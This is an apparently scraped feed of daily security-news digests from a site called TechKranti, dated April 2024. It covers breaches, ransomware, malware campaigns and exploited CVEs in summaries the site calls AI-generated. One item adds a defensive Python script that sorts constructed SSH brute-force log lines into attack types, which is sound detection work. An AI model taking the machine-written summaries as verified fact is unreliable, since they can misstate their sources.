TechKranti (https://techkranti.com): CyberSecurity Revolution

26-Apr-24: In Security News Today
https://techkranti.com/26-apr-24-in-security-news-today/
Fri, 26 Apr 2024 19:54:25 +0000

Kaiser Permanente: Data Breach May Impact 13.4 Million Patients

Kaiser Permanente, a major healthcare service provider, revealed a data breach potentially affecting 13.4 million individuals in the U.S. Personal information was leaked to third-party trackers on their websites and mobile apps, including IP addresses, names, and user interactions. While sensitive data like SSNs and financial details were not compromised, Kaiser Permanente has taken steps to address the incident and will notify those affected as a precaution.

Hackers leak London Stock Exchange Group’s (LSEG) World-Check Screening Database With Over Five Million Records

Hackers leaked the World-Check database from the London Stock Exchange Group, exposing over 5 million records on entities and individuals linked to risks like financial crime and terrorism. The breach, attributed to a group called GhostR, involved data illicitly obtained from a client’s system, not directly from LSEG systems. This database is crucial for entities performing “know your customer” checks to prevent illicit financial activities.

New Brokewell Malware Takes Over Android Devices, Steals Data

Security researchers have discovered a new Android banking trojan named Brokewell that captures device events, steals data, and offers remote control capabilities. The malware is distributed through a fake Google Chrome update, mimics login screens to steal credentials, and can remotely control infected devices. Developed by an individual known as Baron Samedit, Brokewell is expected to be further developed and offered to other cybercriminals, posing a significant threat to Android users. To protect against such malware, users are advised to avoid downloading apps from outside Google Play and ensure Play Protect is active on their devices.

North Korea’s Lazarus Group Deploys New Kaolin RAT via Fake Job Lures

The Lazarus Group, linked to North Korea, used fake job offers to distribute a new remote access trojan called Kaolin RAT in attacks targeting individuals in Asia. The RAT was used to deploy the FudModule rootkit, which relied on a now-patched admin-to-kernel exploit. The sophisticated attack chain showcases Lazarus Group’s continuous innovation and resource allocation, posing a significant challenge to cybersecurity efforts.

Godfather Banking Trojan Spawns 1.2K Samples Across 57 Countries

The Godfather mobile banking Trojan has spawned over 1,000 samples across 57 countries, targeting hundreds of banking apps. Mobile malware-as-a-service operators are rapidly generating unique samples to evade security software, posing a significant challenge to mobile security. Security solutions are struggling to keep up with the increasing number of malware samples, emphasizing the need for adaptive solutions and behavioral analysis to combat evolving mobile threats.

Researchers Found 18 Vulnerabilities in Brocade SANnav

A security assessment of Brocade’s SANnav Management Portal revealed 18 vulnerabilities, including hardcoded Docker keys. The vulnerabilities allowed attackers to compromise the SANnav appliance and Fibre Channel switches, and to intercept credentials sent in clear text. Insecure configurations were identified, such as unencrypted management protocols, hardcoded credentials in Postgres, and insecure Docker instances with read/write access to critical files, posing significant risks to the system’s security.

Autodesk hosting PDF files used in Microsoft phishing attacks

Autodesk is unknowingly hosting malicious PDF files used in sophisticated Microsoft phishing attacks, where victims are tricked into revealing their login credentials. The attackers leverage compromised email accounts to send convincing phishing emails with links to documents on Autodesk Drive, leading to fake Microsoft login forms. The scale and customization of these attacks indicate automation and targeted compromises, emphasizing the importance of vigilance against such threats and the need for hosting companies to prevent abuse of their infrastructure.

Researchers Sinkhole PlugX Malware Server With 2.5 Million Unique IPs

Researchers at Sekoia sinkholed a PlugX malware server, observing 2.5 million unique IP connections from infected hosts in over 170 countries. By acquiring control of the C2 server, they were able to analyze traffic, map infections, and prevent further malicious activities. Sekoia has formulated disinfection strategies to address the challenge of removing PlugX from infected systems and USB drives, calling for national cybersecurity teams to join the effort.

Disclaimer: Titles and summaries are AI-generated. Please refer to the linked content for more details.

25-Apr-24: In Security News Today
https://techkranti.com/25-apr-24-in-security-news-today/
Thu, 25 Apr 2024 20:46:21 +0000

Ransomware payments surpass $1 billion in 2023, report finds

Ransom payments reached over $1 billion in 2023, marking a significant increase in both the scale and cost of ransomware attacks. The Ransomware Task Force (RTF) emphasizes that despite efforts to combat this threat, major challenges persist and half of the proposed strategic recommendations remain under-implemented. The need for intensified collaborative efforts, including legislative actions and international cooperation, is critical to address the evolving and increasingly costly ransomware landscape.

Supplement maker hack allegedly exposes 1M customers

Piping Rock, a supplement manufacturer, experienced a data breach resulting in unauthorized access to over 2.1 million emails, potentially impacting nearly one million customers. The leaked data includes names, addresses, and purchase histories. This breach’s details were confirmed by a Cybernews investigation and were publicly posted on a data leak forum by the perpetrator.

Scammers bypassing Google ad checks to impersonate real brands

Scammers are increasingly manipulating Google’s ad system to impersonate reputable brands, redirecting users to fraudulent sites. Using advanced techniques such as cloaking, they present legitimate content to Google’s bots while showing malicious sites to real users. Security experts recommend vigilance with sponsored search results and the use of protective browser extensions to guard against such malvertising threats.

WP Automatic WordPress plugin hit by millions of SQL injection attacks

Hackers are exploiting a critical vulnerability (CVE-2024-27956) in the WP Automatic WordPress plugin to create admin accounts and plant backdoors on websites. Over 5.5 million attack attempts have been observed, with hackers renaming the vulnerable file ‘csv.php’ and installing additional plugins for file uploads. To prevent compromise, administrators are advised to update the plugin to version 3.92.1 and regularly back up their websites.

Iran Dupes US Military Contractors, Gov’t Agencies in Years-Long Cyber Campaign

An elite team of Iranian state-sponsored hackers infiltrated hundreds of thousands of employee accounts at US companies and government agencies from 2016 to 2021, aiming to steal military secrets. The hackers posed as a cybersecurity company, using social engineering tactics like spearphishing and posing as women to trick victims into clicking on malicious links. The extent of data compromise and whether classified information was accessed remains unclear, and the indicted hackers are currently at large with a reward of up to $10 million offered for information leading to their apprehension.

US Takes Down Illegal Cryptocurrency Mixing Service Samourai Wallet

The US Department of Justice collaborated with Iceland’s authorities to seize Samourai Wallet’s web servers and domain, along with removing its Android app from the Google Play Store in the US. The co-founders, Keonne Rodriguez and William Lonergan Hill, were charged with conspiracy to commit money laundering and operate an unlicensed money-transmitting business. Samourai Wallet, a cryptocurrency mixing service operational since 2015, facilitated over $2bn in unlawful transactions and laundered over $100m in criminal proceeds, serving as a haven for criminals to engage in large-scale money laundering.

North Korea APT Triumvirate Spied on South Korean Defense Industry For Years

A triumvirate of North Korean advanced persistent threat (APT) groups has been conducting extensive espionage on the South Korean defense industry over several years. These groups have effectively compromised multiple South Korean entities to gather intelligence and strategic information. The prolonged cyber-espionage campaign highlights significant vulnerabilities in national security measures and underscores the need for enhanced cybersecurity protocols in sensitive sectors.

Over 1,400 CrushFTP servers vulnerable to actively exploited bug

Over 1,400 CrushFTP servers are vulnerable to a critical server-side template injection (SSTI) bug, allowing unauthenticated attackers to achieve remote code execution. Rapid7 confirmed the severity of the flaw, emphasizing the risk of arbitrary file read and authentication bypass. CrowdStrike reported targeted attacks exploiting the zero-day, urging users to promptly apply patches to safeguard against ongoing exploitation attempts.

LA County Health Services: Patients’ data exposed in phishing attack

The Los Angeles County Department of Health Services experienced a data breach due to a phishing attack in which 23 employees had their credentials stolen. Patients’ personal and health information, including medical records and contact details, was exposed. While no evidence of misuse was found, affected individuals are advised to verify the accuracy of their medical records, and the health system has taken steps to enhance its cybersecurity measures.

Disclaimer: Titles and summaries are AI-generated. Please refer to the linked content for more details.

24-Apr-24: In Security News Today
https://techkranti.com/24-apr-24-in-security-news-today/
Wed, 24 Apr 2024 21:48:34 +0000

U.S. Treasury Sanctions Iranian Firms and Individuals Tied to Cyber Attacks

The U.S. Treasury Department sanctioned two Iranian firms and four individuals for engaging in cyber activities on behalf of the Iranian Revolutionary Guard Corps Cyber Electronic Command. The individuals targeted U.S. companies and government entities through cyber operations, leading to indictments and a reward for information. The defendants face charges including conspiracy to commit computer fraud and wire fraud, with potential prison sentences of up to 20 years.

Researchers Detail Multistage Attack Hijacking Systems with SSLoad, Cobalt Strike

Security researchers have uncovered an ongoing attack campaign, codenamed FROZEN#SHADOW, utilizing phishing emails to distribute SSLoad malware, Cobalt Strike, and ConnectWise ScreenConnect. SSLoad is designed to infiltrate systems, deploy backdoors, and maintain persistence while avoiding detection. The attackers pivot to other systems in the network, including the domain controller, creating their own domain administrator account to achieve high levels of persistence and access within the victim’s Windows domain.

Major Security Flaws Expose Keystrokes of Over 1 Billion Chinese Keyboard App Users

Security vulnerabilities in cloud-based pinyin keyboard apps used by over 1 billion Chinese users were discovered by Citizen Lab, exposing their keystrokes to potential exploitation. Eight out of nine apps from vendors like Baidu, Honor, iFlytek, OPPO, Samsung, Tencent, Vivo, and Xiaomi were found to have weaknesses, with Huawei being the only exception. The vulnerabilities could allow adversaries to decrypt keystrokes passively, prompting recommendations for users to update their apps, switch to on-device keyboard apps, and for developers to use standard encryption protocols.

eScan Antivirus Update Mechanism Exploited to Spread Backdoors and Miners

A new malware campaign is exploiting the eScan antivirus software’s update mechanism to distribute backdoors and cryptocurrency miners, targeting large corporate networks. The threat, known as GuptiMiner, is believed to be connected to a North Korean hacking group called Kimsuky. The malware campaign involves a sophisticated infection chain that leverages a security flaw in eScan’s update mechanism, allowing the attackers to deploy malicious payloads undetected for at least five years.

US Charges Samourai Cryptomixer Founders for Laundering $100 Million

The U.S. Department of Justice has charged Keonne Rodriguez and William Lonergan Hill for laundering over $100 million through their cryptocurrency mixer service, Samourai. Criminals utilized Samourai’s services to process more than $2 billion in illicit funds, with the founders allegedly earning $4.5 million in fees. The founders are facing charges of money laundering and operating an unlicensed money-transmitting business, with Rodriguez in custody and Hill arrested in Portugal awaiting extradition to the U.S.

Medical Diagnostics Provider Synlab Halts Services Over Ransomware Attack

Synlab Italia, part of a major medical diagnostics firm, had to shut down its IT systems nationwide following a cyberattack, suspected to be ransomware, which potentially compromised sensitive customer data. Nearly 400 labs across Italy halted all operations, including patient services and data access. The disruption persisted for several days as the company worked to isolate and address the security breach.

CISA Warns of Windows Print Spooler Flaw After Microsoft Sees Russian Exploitation

CISA has updated its Known Exploited Vulnerabilities catalog to include a critical Windows Print Spooler flaw, CVE-2022-38028, after Microsoft reported its exploitation by Russian cyberespionage group APT28. This vulnerability, discovered in 2022, allows for privilege escalation and has been actively used to deploy malware and harvest credentials across multiple sectors. Organizations are urged to patch this vulnerability promptly to mitigate potential cyber threats.

US Congress Passes Bill to Ban TikTok

The US Senate voted on a bill that could ban TikTok or force ByteDance to relinquish ownership of the app, with 79 senators in favor and 18 against. The bill, titled the Protecting Americans from Foreign Adversary Controlled Applications Act, now awaits President Biden’s signature. ByteDance has a year to disassociate from TikTok in the US or face legal prohibitions, while TikTok’s ties with Chinese intelligence are under scrutiny.

ArcaneDoor Hackers Exploit Cisco Zero-days to Breach Government Networks

Cisco has warned of a state-backed hacking group, identified as UAT4356 and STORM-1849, exploiting two zero-day vulnerabilities in Cisco firewalls since November 2023 to breach government networks worldwide. The vulnerabilities allowed the threat actors to deploy malware implants like ‘Line Dancer’ and ‘Line Runner’ for malicious actions, including configuration modification and network traffic capture. Cisco has released security updates to fix the zero-days and urges customers to upgrade their devices and monitor for any signs of unauthorized activity.

Disclaimer: Titles and summaries are AI-generated. Please refer to the linked content for more details.

22-Apr-24: In Security News Today
https://techkranti.com/22-apr-24-in-security-news-today/
Mon, 22 Apr 2024 20:32:46 +0000

Attacker dumps data of 2.8 million Giant Tiger customers

A threat actor claimed responsibility for a March 2024 data breach at Giant Tiger, exposing 2.8 million customer records including email addresses, names, addresses, and phone numbers. The hacker dropped the data set for free on a forum, requiring ‘8 credits’ to unlock the download link. Giant Tiger attributed the breach to a cybersecurity incident with a third-party vendor, urging customers to be cautious of messages regarding payment information.

Attackers Have Penetrated Volkswagen Group’s Systems, Stealing Over 19,000 Documents with Intellectual Property

Volkswagen Group experienced a significant breach where attackers, suspected to be from China, infiltrated their systems for over five years, exfiltrating around 19,000 documents related to engine and transmission development, including electric vehicle innovations. The German automaker’s security team has recovered some of the stolen files, indicating the potential for a larger undisclosed impact. This extended breach, highlighted by evidence from IP addresses and time zone analyses, underscores a major espionage effort targeting critical technological advancements in the automotive industry.

Synlab Italia suspends operations following ransomware attack

Synlab Italia, part of a global network, suspended all medical diagnostic services in Italy following a ransomware attack that compromised their IT systems. The attack, detected on April 18, led to the shutdown of all computers to contain the breach. While efforts are underway to restore services and eliminate malware, customers are advised to stay updated through the company’s website and social media channels.

Rural Texas Towns Report Cyberattacks That Caused One Water System to Overflow

Recent cyberattacks in rural Texas have impacted local water systems, including an overflow incident caused by Russian hacktivist group infiltrations. These attacks targeted multiple towns, with one resulting in 37,000 failed login attempts over four days. Despite rapid responses from local authorities to mitigate damage, these incidents underscore the increasing vulnerability of public utilities to cyber threats and emphasize the need for enhanced security measures.

Researchers Uncover Windows Flaws Granting Attackers Rootkit-Like Powers

Researchers have discovered flaws in the Windows DOS-to-NT path conversion process that threat actors can exploit to gain rootkit-like capabilities, allowing them to hide files and processes and carry out malicious actions without admin permissions. The research surfaced several security shortcomings: an elevation of privilege deletion vulnerability, an elevation of privilege write vulnerability, a remote code execution vulnerability, and a denial-of-service vulnerability impacting Process Explorer. The implications of these vulnerabilities extend beyond Microsoft Windows, highlighting the importance for all software vendors of addressing known issues to prevent significant security risks.

Ukrainian Soldiers’ Apps Increasingly Targeted for Spying

Ukrainian soldiers’ messaging apps are increasingly targeted by hackers for spying, as reported by CERT-UA. The surge in attacks is attributed to a group known as UAC-0184, deploying various malware like HijackLoader and Remcos. Russian hackers have also been previously identified targeting Ukraine’s military messaging apps, aiming to exfiltrate encrypted communications and sensitive data.

51% of Enterprises Experienced a Breach Despite Large Security Stacks

Despite investing in large security stacks, 51% of enterprises experienced a breach in the past 24 months, leading to unplanned downtime, data exposure, and financial loss. Enterprises prioritize pentesting but struggle with a frequency gap between IT environment changes and security validation testing. Organizations are adopting more cybersecurity tools to manage risk, with an average of 53 security solutions in use, but face resource constraints and network downtime concerns related to pentesting.

MITRE Breached by Nation-state Threat Actor via Ivanti Zero-days

MITRE Corporation was breached by a nation-state threat actor through two zero-day vulnerabilities in Ivanti’s Connect Secure VPN devices, leading to lateral movement and compromise of the company’s VMware infrastructure. The attackers exploited the vulnerabilities to hijack VPN sessions, maintain persistence with webshells and backdoors, exfiltrate data, and create staging virtual machines. MITRE responded by taking down the affected environment, initiating an investigation, and sharing advice for defenders to monitor VPN traffic, segment networks, and use threat intelligence feeds.

An Unrestricted File Upload Vulnerability in the Forminator Plugin Impacts Hundreds of Thousands of WordPress Sites

Japan’s CERT has warned of multiple vulnerabilities in the Forminator WordPress plugin, including a critical flaw allowing unrestricted file uploads, potentially leading to remote code execution and sensitive data exposure. The plugin, with over 500,000 installations, is susceptible to attacks exploiting CVE-2024-28890, CVE-2024-31077, and CVE-2024-31857. Admins are urged to update to version 1.29.3 to mitigate these risks, as over 200,000 sites remain vulnerable to cyber attacks.

Cannes Hospital Cancels Medical Procedures Following Cyberattack

Cannes Hospital was forced to cancel non-urgent medical procedures and revert to manual operations after a cyberattack led to a shutdown of its IT systems. The hospital has prioritized emergency and essential services while cooperating with regional healthcare entities to manage patient needs effectively. No data theft or ransom demands have been reported, though the recovery of IT services is anticipated to be a prolonged process.

Researchers Observe a Flood of Crude and Amateurish Ransomware

Sophos X-Ops researchers report an upsurge in the sale of inexpensive, rudimentary ransomware on the dark web, referred to as “junk guns.” These low-cost ransomware tools are accessible for as little as $20, attracting lower-skilled criminals targeting small businesses and individuals. Despite their affordability and simplicity, these ransomware variants represent a growing risk to smaller targets, emphasizing the need for heightened awareness and defense measures in cybersecurity practices.

Ransomware Double-Dip: Re-Victimization in Cyber Extortion

A new trend in ransomware attacks involves “double-dipping” where threat actors repeatedly target previously victimized entities, often through re-use of stolen data or access. This cyclic victimization not only compounds the distress for affected organizations but also signifies a shift towards more aggressive extortion tactics in the cybercrime ecosystem. The increasing frequency of such re-attacks highlights a critical vulnerability in cybersecurity defenses and emphasizes the necessity for improved protective measures and response strategies.

Almost 200,000 data tracking attempts were made in just 30 days on a regular Android device through installed apps.

A recent study using /e/OS on an Android device revealed nearly 195,000 data tracking attempts within a month from 34 third-party apps, indicating a significant privacy risk. Data collected ranged from user demographics to sensitive information, with some data being sent to servers in Russia and China. The pervasive nature of this tracking emphasizes the challenges in avoiding surveillance, even with stringent privacy settings.

Disclaimer: Titles and summaries are AI-generated. Please refer to the linked content for more details.

19-Apr-24: In Security News Today
https://techkranti.com/19-apr-24-in-security-news-today/
Fri, 19 Apr 2024 21:47:53 +0000

Akira Ransomware Gang Extorts $42 Million; Now Targets Linux Servers

The Akira ransomware group has extorted $42 million from over 250 victims by targeting businesses and critical infrastructure in North America, Europe, and Australia. They have evolved to target Linux servers, using various tactics like exploiting known vulnerabilities in Cisco appliances and utilizing tools like Mimikatz for privilege escalation. Additionally, the Akira ransomware group is believed to be linked to the Conti ransomware gang and has been observed using a hybrid encryption algorithm to encrypt systems.

180k Impacted by Data Breach at Michigan Healthcare Organization

Cherry Health in Michigan reported a ransomware attack that compromised the personal data of approximately 184,000 individuals on December 21, 2023. The breach involved sensitive information including Social Security numbers, health insurance details, and financial account information. The organization has notified affected individuals and is offering free credit monitoring and identity protection services.

22,500 Palo Alto Firewalls “Possibly Vulnerable” to Ongoing Attacks

Approximately 22,500 Palo Alto GlobalProtect firewall devices are vulnerable to the CVE-2024-3400 flaw, allowing unauthenticated attackers to execute commands with root privileges. Palo Alto Networks released patches between April 14 and 18, 2024, after the flaw was actively exploited by state-backed threat actors. Despite mitigation efforts, there are still around 22,500 possibly vulnerable instances, mainly in the United States, Japan, and India.

United Nations Agency Investigates Ransomware Attack, Data Theft

The United Nations Development Programme (UNDP) is investigating a cyberattack where threat actors breached its IT systems to steal human resources data. The attack, possibly linked to the 8Base ransomware gang, resulted in the exposure of sensitive information such as personal data, accounting data, and employment contracts. This incident highlights the ongoing threat of ransomware attacks targeting organizations, including those as prominent as the United Nations.

France’s Cannes Hospital in Midst of Major Cyberattack

Hôpital de Cannes – Simone Veil in France was hit by a severe cyberattack, resulting in all IT systems being shut down and the hospital reverting to manual, paper-based methods for documenting patient services. The hospital has canceled about a third of non-urgent procedures and is coordinating with local medical facilities to maintain emergency services. Ongoing investigations are supported by multiple cybersecurity agencies, and while there have been no ransom demands or confirmed data breaches, the hospital remains vigilant in maintaining patient care and updates.

OpenMetadata Vulnerabilities Exploited to Abuse Kubernetes Clusters for Cryptomining

Multiple vulnerabilities in OpenMetadata have been exploited to compromise Kubernetes clusters for cryptomining purposes. Threat actors have utilized critical authentication bypass and remote code execution flaws to infiltrate systems, downloading cryptomining malware from servers based in China. Microsoft advises updating OpenMetadata to the latest version to mitigate these risks and protect Kubernetes environments.

Cyberattack Takes Texas-based Frontier Communications Offline

Frontier Communications, a Texas-based telecom provider operating in 25 states, shut down its operations following a cyberattack that led to the theft of personally identifiable information. The breach, detected on April 14, resulted in certain systems being taken offline, causing operational disruptions. The company is currently investigating the incident, engaging cybersecurity experts, and cooperating with law enforcement authorities.

Russian APT Group Thwarted in Attack on US Automotive Manufacturer

Researchers disclosed an attack campaign by the FIN7 threat group targeting a US-based global automotive manufacturer, using spear-phishing to target IT employees with high admin-level rights. BlackBerry’s threat and research team detected and stopped the attack before the ransomware phase. FIN7, also known as Carbon Spider, is expanding its targets to include defense, insurance, and transportation sectors, aiming for larger entities with the expectation of higher ransom payments.

Multiple LastPass Users Lose Master Passwords to Ultra-Convincing Scam

A sophisticated phishing campaign named CryptoChameleon has targeted LastPass users, tricking them into revealing their master passwords through a series of well-crafted social engineering tactics. The attackers use a combination of phone calls, spoofed numbers, and personalized interactions to deceive victims into divulging sensitive information. Despite the attackers’ persistence and evolving tactics, awareness, caution with unsolicited communications, and refraining from sharing passwords are crucial defenses against such elaborate phishing schemes.

MITRE Says State Hackers Breached its Network via Ivanti Zero-days

MITRE Corporation disclosed a state-backed hacking group breached their systems in January 2024 by exploiting two Ivanti VPN zero-days, compromising their NERVE network. The attackers bypassed MFA defenses, used webshells and backdoors, and deployed malware for espionage. The incident led to mass exploitation affecting various organizations, prompting CISA to issue an emergency directive for federal agencies to mitigate the Ivanti zero-days.

UNDP, City of Copenhagen Targeted in Data-Extortion Cyberattack

The United Nations Development Programme (UNDP) and the city of Copenhagen, Denmark, were targeted in a cyberattack in late March, leading to data theft related to human resources and procurement. The UNDP is currently assessing the extent of the breach and has taken steps to identify the source and contain the affected server. While the ransomware gang 8Base claimed responsibility for the attack, the UNDP has not confirmed any ransom demands or payments.

Disclaimer: Titles and summaries are AI-generated. Please refer to the linked content for more details.

17-Apr-24: In Security News Today
https://techkranti.com/17-apr-24-in-security-news-today/
Wed, 17 Apr 2024 20:26:13 +0000

Asantee Games Has Exposed Data From More Than 14 Million Players Due to its Failure to Set Up a Password

Asantee Games experienced a significant data leak impacting over 14 million players of their game, Magic Rampage, due to a misconfigured MongoDB database that lacked password protection. The exposed data included player usernames, emails, device data, and admin credentials with encrypted passwords. This breach poses serious risks for identity theft, phishing attacks, and unauthorized access to internal systems, highlighting the need for stringent database security practices.

Cherry Health Hit by Ransomware Attack Affecting 185,000 Individuals

Cherry Health, a U.S.-based healthcare provider, experienced a ransomware attack affecting 185,000 individuals, with a variety of personal and medical information compromised. This included names, addresses, health records, and Social Security numbers. The organization has since engaged third-party specialists for a comprehensive investigation and is advising affected patients to monitor their credit reports and account statements for any suspicious activity.

SAP Users Are at High Risk as Cybercriminals Exploit Application Vulnerabilities

Recent research highlights a significant increase in threat actor interest in exploiting SAP vulnerabilities, leading to a surge in ransomware incidents targeting poorly patched organizations. The research reveals a 400% growth in attacks since 2021, with ransomware groups like Conti, Quantum, and REvil being involved. Dark web chatter on SAP vulnerabilities has surged by 490%, emphasizing the need for organizations to secure their SAP systems, patch vulnerabilities, and enhance cybersecurity measures.

If you use Fortinet FortiClient EMS, patch NOW

Researchers at Forescout have documented a campaign, codenamed Connect:fun, exploiting CVE-2023-48788, a critical SQL injection flaw in Fortinet FortiClient EMS, to deploy ScreenConnect and the Metasploit Powerfun PowerShell payload. The activity observed targeted a media company, used the injection to download and install that tooling, and showed signs of hands-on-keyboard operation and deliberate targeting rather than mass exploitation. Upgrade to a fixed FortiClient EMS release first; a web application firewall in front of the EMS server and monitoring for unexpected ScreenConnect installs or PowerShell spawned by the EMS SQL Server process are compensating controls, not substitutes for the patch.

Exploitation of Palo Alto Firewall Vulnerability Picking Up After PoC Release

Exploitation of CVE-2024-3400, a command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS, has increased since proof-of-concept code was published. The flaw lets an unauthenticated attacker run arbitrary code as root on the firewall. Early reports tied exploitation to firewalls with both GlobalProtect and device telemetry enabled, but Palo Alto Networks later clarified that telemetry is not required for a firewall to be exposed, so telemetry settings should not be treated as a mitigation. Security firms have observed sophisticated actors, including a suspected state-sponsored group, using the flaw to get into networks and drop payloads; the fix is the PAN-OS hotfix for the affected 10.2, 11.0 and 11.1 releases, with Threat Prevention signatures as an interim control.

Cisco: Multiple VPN, SSH Services Targeted in Mass Brute-Force Attacks

Cisco Talos has reported a surge in brute-force and password-spraying attacks against VPN services, web application authentication interfaces, and SSH, launched through anonymizing proxies and Tor exit nodes. The attempts combine generic usernames with usernames specific to the targeted organization, which suggests some prior reconnaissance, and they can lead to unauthorized access or to account lockouts and service disruption. Talos has added the observed source addresses to its block list but expects the activity to continue and possibly escalate. Useful checks on the defender's side are failed-login counts per source address, the ratio of nonexistent to existing usernames in those failures, and whether sources appear in Tor exit or proxy feeds.
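The following is an added example, not code from Cisco Talos or from this site. It shows the detection check the item above implies: aggregate sshd password-authentication events per source address, use sshd's own "invalid user" marker to separate wordlist names from accounts that really exist (the organization-specific usernames Talos mentions), classify each source as brute force or username spraying, and tag sources present in an anonymizer list. The log lines, usernames, addresses, the anonymizer set and the thresholds are all constructed for the example.

```python
import re

# Constructed sample lines in OpenSSH auth.log format. Host, PIDs, usernames
# and addresses are invented for this example.
SAMPLE_AUTH_LOG = """\
Apr 16 02:11:01 vpn-gw sshd[4120]: Failed password for invalid user admin from 185.220.101.7 port 51002 ssh2
Apr 16 02:11:03 vpn-gw sshd[4120]: Failed password for invalid user test from 185.220.101.7 port 51004 ssh2
Apr 16 02:11:05 vpn-gw sshd[4120]: Failed password for invalid user oracle from 185.220.101.7 port 51006 ssh2
Apr 16 02:11:07 vpn-gw sshd[4120]: Failed password for jsmith from 185.220.101.7 port 51008 ssh2
Apr 16 02:11:09 vpn-gw sshd[4120]: Failed password for mwilson from 185.220.101.7 port 51010 ssh2
Apr 16 02:11:11 vpn-gw sshd[4120]: Failed password for rpatel from 185.220.101.7 port 51012 ssh2
Apr 16 02:12:01 vpn-gw sshd[4131]: Failed password for root from 203.0.113.9 port 40001 ssh2
Apr 16 02:12:02 vpn-gw sshd[4131]: Failed password for root from 203.0.113.9 port 40002 ssh2
Apr 16 02:12:03 vpn-gw sshd[4131]: Failed password for root from 203.0.113.9 port 40003 ssh2
Apr 16 02:12:04 vpn-gw sshd[4131]: Failed password for root from 203.0.113.9 port 40004 ssh2
Apr 16 02:12:05 vpn-gw sshd[4131]: Failed password for root from 203.0.113.9 port 40005 ssh2
Apr 16 02:13:00 vpn-gw sshd[4140]: Failed password for jsmith from 198.51.100.23 port 33001 ssh2
Apr 16 02:13:05 vpn-gw sshd[4140]: Accepted password for jsmith from 198.51.100.23 port 33001 ssh2
"""

# Stand-in for a Tor exit-node / anonymizing-proxy feed (constructed; in
# practice load the Tor Project exit list or a commercial proxy feed).
KNOWN_ANONYMIZERS = {"185.220.101.7"}

# sshd writes "invalid user" when the account does not exist at all, which is
# the signal that separates wordlist names from real organization usernames.
LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?P<invalid>invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)

FAIL_THRESHOLD = 5   # failures from one source before it is reported at all
SPRAY_USERS = 4      # distinct usernames from one source that indicates spraying


def summarize_sources(log_text):
    """Aggregate sshd password-auth events per source address."""
    stats = {}
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        s = stats.setdefault(m["src"], {
            "failures": 0, "accepted": 0,
            "valid_users": set(), "invalid_users": set(),
        })
        s["failures" if m["result"] == "Failed" else "accepted"] += 1
        s["invalid_users" if m["invalid"] else "valid_users"].add(m["user"])
    return stats


def classify(stats):
    """Report sources over the failure threshold as brute-force or spraying."""
    findings = []
    for src, s in sorted(stats.items()):
        if s["failures"] < FAIL_THRESHOLD:
            continue
        users = s["valid_users"] | s["invalid_users"]
        findings.append({
            "src": src,
            # many failures spread over many names is spraying/enumeration;
            # many failures against one or two names is classic brute force
            "kind": "username-spray" if len(users) >= SPRAY_USERS else "brute-force",
            "failures": s["failures"],
            "accepted": s["accepted"],
            "distinct_users": len(users),
            "valid_users_targeted": sorted(s["valid_users"]),
            "anonymizer": src in KNOWN_ANONYMIZERS,
        })
    return findings


if __name__ == "__main__":
    for f in classify(summarize_sources(SAMPLE_AUTH_LOG)):
        print(f)
```

On the sample data the Tor-listed source is reported as a username spray that touched three real accounts, the second source as a brute-force run against root, and the legitimate user who mistyped once is not reported. The valid_users_targeted list is the actionable output: those are the accounts to check for lockouts and, if any attempt was accepted, to reset.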

Ivanti Releases Fixes for More Than 2 Dozen Vulnerabilities

Ivanti has fixed 27 vulnerabilities in Avalanche with its 2024 first-quarter release, ranging from flaws that let an authenticated remote attacker read sensitive information to heap overflow vulnerabilities that allow remote command execution. The company recommends updating to Avalanche 6.4.3, which applies all of the fixes, and notes that the installer prompts for the MSSQL database password, so have it available before starting. The update and instructions are on Ivanti's website.

Disclaimer: Titles and summaries are AI-generated. Please refer to the linked content for more details.

]]>
https://techkranti.com/17-apr-24-in-security-news-today/feed/ 0 717
16-Apr-24: In Security News Today https://techkranti.com/16-apr-24-in-security-news-today/ https://techkranti.com/16-apr-24-in-security-news-today/#respond Wed, 17 Apr 2024 05:53:23 +0000 https://techkranti.com/?p=714 Hive Trojan Creators and $3.5M Cryptojacking Mastermind Arrested in Global Crackdown

Two individuals have been arrested in Australia and the U.S. for their involvement in developing and distributing the remote access trojan Hive RAT, allowing control over victim computers and access to private information. Additionally, a Nebraska man was indicted for operating a $3.5 million illegal cryptojacking operation, defrauding cloud computing providers to mine cryptocurrency. The suspects face charges including wire fraud, money laundering, and engaging in unlawful monetary transactions, with potential sentences of up to 20 years in prison.

Iran-Backed Hackers Blast Out Threatening Texts to Israelis

The Handala cyber group, allegedly backed by Iran, claimed to have compromised Israel’s radar systems and sent over 500,000 threatening texts to Israeli citizens amidst ongoing military tensions. The messages warned of imminent danger and urged citizens to evacuate, amplifying fear and confusion. While these claims have yet to be verified by Israeli officials, they reflect the escalating use of cyber warfare in geopolitical conflicts.

Ransomware Group Starts Leaking Data Allegedly Stolen From Change Healthcare

The RansomHub group has begun to leak data they claim to have stolen from Change Healthcare, involving highly sensitive personal and medical information. This follows an earlier ransomware attack by the Alphv/BlackCat group, from which RansomHub acquired the data. In response to these events, Change Healthcare’s parent company, UnitedHealth Group, is working on mitigating the impact on affected customers and has provided significant financial support to healthcare providers.

Change Healthcare cyberattack caused $872 million loss

UnitedHealth Group experienced an $872 million impact on its Q1 earnings as a result of a ransomware attack on Change Healthcare, with $593 million in direct cyberattack response costs and $279 million due to business disruptions. The attack led to a $0.74 per share impact in Q1, with estimated full-year 2024 impacts of $1.15 to $1.35 per share. The cyberattack disrupted the U.S. healthcare system, affecting claims receipt timing and prompting UnitedHealth to reflect an additional $800 million in claims reserves.

Omni Hotels Says Personal Information Stolen in Ransomware Attack

Omni Hotels confirmed a ransomware attack by the Daixin Team, which led to the theft of customer data dating back to 2017, affecting an estimated 3.5 million guests. Although sensitive financial details were not exposed, compromised data included names, emails, mailing addresses, and loyalty program information. The company has restored its systems and is navigating ransom negotiations, initially set at $3.5 million but reduced to $2 million.

Cisco Duo’s Multifactor Authentication Service Breached

A third-party provider that handles telephony for Cisco's Duo multifactor authentication service was compromised through social engineering, and the attacker downloaded MFA SMS and VoIP message logs for specific users. The logs contain phone numbers and message metadata rather than the one-time codes themselves, so the immediate risk is targeted phishing against the people in those logs; Cisco Duo customers were advised to warn affected users accordingly. The incident shows how a breach at an identity-service supplier propagates to its customers, and why such suppliers belong in a third-party risk assessment.

Disclaimer: Titles and summaries are AI-generated. Please refer to the linked content for more details.

]]>
